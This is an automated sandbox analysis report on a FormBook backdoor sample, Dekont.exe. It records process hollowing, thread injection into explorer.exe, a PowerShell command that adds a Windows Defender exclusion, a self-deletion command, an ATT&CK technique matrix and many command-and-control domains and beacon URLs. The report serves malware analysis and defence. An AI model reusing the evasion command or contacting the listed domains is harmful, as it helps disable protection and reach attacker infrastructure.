          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_0109A8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_0100C8F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_0104EB1D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_01098B28 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FD0AD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_01084B4B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_01078B42 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_01066B40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_0109AB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_0107EB50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FD8AA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FDEA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FE0A5B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FD6A50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_01084BB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FF4A35 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FFEA2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_0107EBD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_0105CBF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FFEBFC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FD8BF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_0105CA11 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_0100CA24 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FD0BCD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FF0BCB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_0100CA38 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FE0BBE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_0107EA60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_0100CA6F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_0104CA72 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FCCB7E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_010A4A80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_01008A90 mov edx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_01026AA4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_01026ACC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_01004AD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FFEB20 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_0100AAEE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_01088D10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_01004D1D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_01058D20 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FCCCC8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FF8CB1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_01068D6B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_00FC8C8D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_01006DA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe Code function: 5_2_01098DAE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_008772CE GetProcessHeap,HeapAlloc,GetProcessHeap,
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Dekont.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_008742F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_00874550 SetUnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\Dekont.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\Dekont.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe"
          Source: C:\Users\user\Desktop\Dekont.exe NtClose: Indirect: 0xF5A56C
          Source: C:\Users\user\Desktop\Dekont.exe NtQueueApcThread: Indirect: 0xF5A4F2
          Source: C:\Users\user\Desktop\Dekont.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Dekont.exe Section loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Dekont.exe Thread register set: target process: 1028
          Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 1028
          Source: C:\Users\user\Desktop\Dekont.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\Dekont.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 870000
          Source: C:\Users\user\Desktop\Dekont.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe"
          Source: C:\Users\user\Desktop\Dekont.exe Process created: C:\Users\user\Desktop\Dekont.exe "C:\Users\user\Desktop\Dekont.exe"
          Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Dekont.exe"
          Source: explorer.exe, 00000006.00000000.2089618463.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3854649429.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4533610517.0000000009C22000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
          Source: explorer.exe, 00000006.00000002.4519292982.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2078216308.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000002.4521804359.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4519292982.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2078216308.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000002.4519292982.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2078216308.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.4519292982.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2078216308.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.2077619011.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4517983808.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PProgman
          Source: C:\Users\user\Desktop\Dekont.exe Queries volume information: C:\Users\user\Desktop\Dekont.exe VolumeInformation
          Source: C:\Users\user\Desktop\Dekont.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Dekont.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Dekont.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Dekont.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Dekont.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Dekont.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Dekont.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_00874775 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\Dekont.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match, File source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match, File source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Shared Modules | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | LSASS Memory | 241 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 41 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | 213 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
          IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph ID: 1517901  Sample: Dekont.exe  Startdate: 25/09/2024  Architecture: WINDOWS  Score: 100

• Start
  • www.nnevateknoloji.xyz (DNS/IP Info)
    • Performs DNS queries to domains with low reputation (Signature)
  • www.y-language-menu.net (DNS/IP Info)
  • 9 other IPs or domains
  • Suricata IDS alerts for network traffic (Signature)
  • Found malware configuration (Signature)
  • Malicious sample detected (through community Yara rule) (Signature)
  • 9 other signatures
  • Dekont.exe 4 (Process, started)
    • C:\Users\user\AppData\...\Dekont.exe.log, ASCII (Created File, dropped)
    • Adds a directory exclusion to Windows Defender (Signature)
    • Tries to detect virtualization through RDTSC time measurements (Signature)
    • Switches to a custom stack to bypass stack traces (Signature)
    • Dekont.exe (Process, started)
      • Modifies the context of a thread in another process (thread injection) (Signature)
      • Maps a DLL or memory area into another process (Signature)
      • Sample uses process hollowing technique (Signature)
      • 2 other signatures
      • explorer.exe 99 7 (Process, injected)
        • www.oko.events 185.26.122.70, 49715, 80 HOSTLANDRU Russian Federation (DNS/IP Info)
        • control.exe (Process, started)
          • Modifies the context of a thread in another process (thread injection) (Signature)
          • Maps a DLL or memory area into another process (Signature)
          • Tries to detect virtualization through RDTSC time measurements (Signature)
          • Switches to a custom stack to bypass stack traces (Signature)
          • cmd.exe 1 (Process, started)
            • conhost.exe (Process, started)
    • powershell.exe 23 (Process, started)
      • Loading BitLocker PowerShell Module (Signature)
      • WmiPrvSE.exe (Process, started)
      • conhost.exe (Process, started)

Source | Detection | Scanner | Label | Link
Dekont.exe | 58% | ReversingLabs | Win32.Backdoor.FormBook |
Dekont.exe | 100% | Joe Sandbox ML | |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label | Link
https://excel.office.com | 0% | URL Reputation | safe |
http://schemas.micro | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://android.notify.windows.com/iOS | 0% | URL Reputation | safe |
https://api.msn.com/ | 0% | URL Reputation | safe |
http://www.eals.latReferer: | 0% | Avira URL Cloud | safe |
http://www.omotech-dz.netReferer: | 0% | Avira URL Cloud | safe |
http://www.nnevateknoloji.xyzReferer: | 0% | Avira URL Cloud | safe |
http://www.nnevateknoloji.xyz/bc01/ | 0% | Avira URL Cloud | safe |
https://word.office.comon | 0% | Avira URL Cloud | safe |
http://www.oko.eventsReferer: | 0% | Avira URL Cloud | safe |
https://powerpoint.office.comcember | 0% | Avira URL Cloud | safe |
http://www.omotech-dz.net/bc01/www.y-language-menu.net | 0% | Avira URL Cloud | safe |
http://www.avada-casino-tlj.buzz/bc01/ | 0% | Avira URL Cloud | safe |
http://www.lkjuy.xyz/bc01/ | 0% | Avira URL Cloud | safe |
http://www.lussalesapp.websiteReferer: | 0% | Avira URL Cloud | safe |
http://www.oko.events | 0% | Avira URL Cloud | safe |
www.avada-casino-tlj.buzz/bc01/ | 0% | Avira URL Cloud | safe |
http://www.y-language-menu.net/bc01/www.ebshieldsrenew.live | 0% | Avira URL Cloud | safe |
http://www.oko.events/bc01/ | 0% | Avira URL Cloud | safe |
http://www.hildrens-clothing.today/bc01/ | 0% | Avira URL Cloud | safe |
http://www.inancialenlightment.infoReferer: | 0% | Avira URL Cloud | safe |
http://www.48xc300mw.autosReferer: | 0% | Avira URL Cloud | safe |
http://www.qzxx.top | 0% | Avira URL Cloud | safe |
http://www.qzxx.top/bc01/ | 0% | Avira URL Cloud | safe |
http://www.avada-casino-tlj.buzz/bc01/www.qzxx.top | 0% | Avira URL Cloud | safe |
http://www.48xc300mw.autos/bc01/ | 0% | Avira URL Cloud | safe |
http://www.ebshieldsrenew.live/bc01/ | 0% | Avira URL Cloud | safe |
http://www.hildrens-clothing.today/bc01/www.olocaustaffirmer.net | 0% | Avira URL Cloud | safe |
http://www.lussalesapp.website | 0% | Avira URL Cloud | safe |
http://www.olocaustaffirmer.netReferer: | 0% | Avira URL Cloud | safe |
http://www.48xc300mw.autos/bc01/www.avada-casino-tlj.buzz | 0% | Avira URL Cloud | safe |
http://www.y-language-menu.netReferer: | 0% | Avira URL Cloud | safe |
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | 0% | Avira URL Cloud | safe |
http://www.qzxx.topReferer: | 0% | Avira URL Cloud | safe |
http://www.olocaustaffirmer.net/bc01/ | 0% | Avira URL Cloud | safe |
http://www.lkjuy.xyzReferer: | 0% | Avira URL Cloud | safe |
http://www.ar-accident-lawyer-389.today/bc01/www.nnevateknoloji.xyz | 0% | Avira URL Cloud | safe |
http://www.omotech-dz.net/bc01/ | 0% | Avira URL Cloud | safe |
http://www.y-language-menu.net/bc01/ | 0% | Avira URL Cloud | safe |
http://www.eals.lat/bc01/www.lussalesapp.website | 0% | Avira URL Cloud | safe |
https://wns.windows.com/)s | 0% | Avira URL Cloud | safe |
http://www.nnevateknoloji.xyz/bc01/www.eddogbrands.website | 0% | Avira URL Cloud | safe |
http://www.ebshieldsrenew.live | 0% | Avira URL Cloud | safe |
http://www.hildrens-clothing.todayReferer: | 0% | Avira URL Cloud | safe |
http://www.inancialenlightment.info/bc01/ | 0% | Avira URL Cloud | safe |
http://www.eddogbrands.website/bc01/ | 0% | Avira URL Cloud | safe |
http://www.lussalesapp.website/bc01/ | 0% | Avira URL Cloud | safe |
http://www.ar-accident-lawyer-389.today/bc01/ | 0% | Avira URL Cloud | safe |
http://www.inancialenlightment.info/bc01/www.omotech-dz.net | 0% | Avira URL Cloud | safe |
http://www.hildrens-clothing.today | 0% | Avira URL Cloud | safe |
http://www.autoitscript.com/autoit3/J | 0% | Avira URL Cloud | safe |
http://www.lkjuy.xyz | 0% | Avira URL Cloud | safe |
http://www.oko.events/bc01/?L0D=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObEUMh//SmEX6&2dptmT=8paLMJPH3rxHgFq0 | 0% | Avira URL Cloud | safe |
http://www.lkjuy.xyz/bc01/www.inancialenlightment.info | 0% | Avira URL Cloud | safe |
http://www.lussalesapp.website/bc01/www.48xc300mw.autos | 0% | Avira URL Cloud | safe |
http://www.eddogbrands.website | 0% | Avira URL Cloud | safe |
http://www.omotech-dz.net | 0% | Avira URL Cloud | safe |
http://www.avada-casino-tlj.buzzReferer: | 0% | Avira URL Cloud | safe |
http://www.olocaustaffirmer.net | 0% | Avira URL Cloud | safe |
http://www.eddogbrands.website/bc01/www.lkjuy.xyz | 0% | Avira URL Cloud | safe |
https://outlook.com | 0% | Avira URL Cloud | safe |
http://www.inancialenlightment.info | 0% | Avira URL Cloud | safe |
http://www.ebshieldsrenew.live/bc01/www.oko.events | 0% | Avira URL Cloud | safe |
http://www.eals.lat | 0% | Avira URL Cloud | safe |
http://www.olocaustaffirmer.net/bc01/www.eals.lat | 0% | Avira URL Cloud | safe |
http://www.nnevateknoloji.xyz | 0% | Avira URL Cloud | safe |
http://www.ebshieldsrenew.liveReferer: | 0% | Avira URL Cloud | safe |
http://www.eddogbrands.websiteReferer: | 0% | Avira URL Cloud | safe |
http://www.48xc300mw.autos | 0% | Avira URL Cloud | safe |
http://www.avada-casino-tlj.buzz | 0% | Avira URL Cloud | safe |
http://www.ar-accident-lawyer-389.todayReferer: | 0% | Avira URL Cloud | safe |
http://www.eals.lat/bc01/ | 0% | Avira URL Cloud | safe |
http://www.ar-accident-lawyer-389.today | 0% | Avira URL Cloud | safe |
http://crl.v | 0% | Avira URL Cloud | safe |
http://www.y-language-menu.net | 0% | Avira URL Cloud | safe |
http://www.oko.events/bc01/www.hildrens-clothing.today | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.oko.events | 185.26.122.70 | true | true | | unknown
www.eddogbrands.website | unknown | unknown | true | | unknown
www.omotech-dz.net | unknown | unknown | true | | unknown
www.nnevateknoloji.xyz | unknown | unknown | true | | unknown
www.inancialenlightment.info | unknown | unknown | true | | unknown
www.y-language-menu.net | unknown | unknown | true | | unknown
www.ebshieldsrenew.live | unknown | unknown | true | | unknown
www.hildrens-clothing.today | unknown | unknown | true | | unknown
www.eals.lat | unknown | unknown | true | | unknown
www.ar-accident-lawyer-389.today | unknown | unknown | true | | unknown
www.olocaustaffirmer.net | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
www.avada-casino-tlj.buzz/bc01/ | true | Avira URL Cloud: safe | unknown
http://www.oko.events/bc01/?L0D=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObEUMh//SmEX6&2dptmT=8paLMJPH3rxHgFq0 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://word.office.comon | explorer.exe, 00000006.00000000.2089618463.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4530151836.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.oko.eventsReferer: | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nnevateknoloji.xyzReferer: | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://powerpoint.office.comcember | explorer.exe, 00000006.00000002.4536578423.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2094235679.000000000C460000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.avada-casino-tlj.buzz/bc01/ | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
